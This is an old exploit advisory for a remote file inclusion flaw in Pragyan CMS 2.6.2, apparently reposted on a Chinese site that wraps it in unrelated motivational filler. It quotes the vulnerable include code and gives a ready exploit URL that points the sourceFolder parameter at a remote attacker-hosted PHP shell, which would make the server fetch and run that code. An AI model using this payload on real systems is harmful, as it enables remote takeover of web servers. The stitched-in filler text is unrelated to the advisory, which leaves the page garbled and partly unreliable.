Pragyan CMS 2.6.2 (sourceFolder) Remote File Inclusion Vulnerability

爬山和爱情一样,爬得越高摔得越惨,同样,爱得越深,受伤的几率越大。人的一生全靠奋斗,唯有奋斗才能成功。让我们一起来奋斗吧!相信自己,我们会谱出一段美妙的音符,来唱出我们心中的那首歌!
<< In The Name Of GOD >>


-------------------------------------------------------------
- [ Persian Boys Hacking Team ] -:- 2008
-
- discovered by N3TR00T3R [at] Y! [dot] com
- pragyan 2.6.2 Remote File Includion
- download :http://sourceforge.net/project/showfiles.php?group_id=220286
- sp tnx : Sp3shial,Veroonic4,God_Master_hacker,a_reptil,Ciph3r,shayan_cmd
r00t.master,Dr.root,Pouya_server,Spyn3t,LordKourosh,123qwe,mr.n4ser
Zahacker,goli_boya,i_reza_i,programer, and all irchatan members ...
[www.Persian-Boys.com] & [www.irchatan.com]
--------------------------------------------------------------

if register_globals = On;


Vul Code : [/cms/modules/form.lib.php]
##########################################################
#global $sourceFolder;
#global $moduleFolder;
#require_once("$sourceFolder/$moduleFolder/form/editform.php");
#require_once("$sourceFolder/$moduleFolder/form/editformelement.php");
#require_once("$sourceFolder/$moduleFolder/form/registrationformgenerate.php");
#require_once("$sourceFolder/$moduleFolder/form/registrationformsubmit.php");
#require_once("$sourceFolder/$moduleFolder/form/viewregistrants.php");
##########################################################

Exploit :

##########################################################
#
# www.target.com/path/cms/modules/form.lib.php?sourceFolder=http://shell.own3r.by.ru/syn99.php?
#
##########################################################

到此这篇关于Pragyan CMS 2.6.2 (sourceFolder) Remote File Inclusion Vulnerability 就介绍到这了。认识自己,降伏自己,改变自己,才能改变别人。更多相关Pragyan CMS 2.6.2 (sourceFolder) Remote File Inclusion Vulnerability 内容请查看相关栏目,小编编辑不易,再次感谢大家的支持!

标签: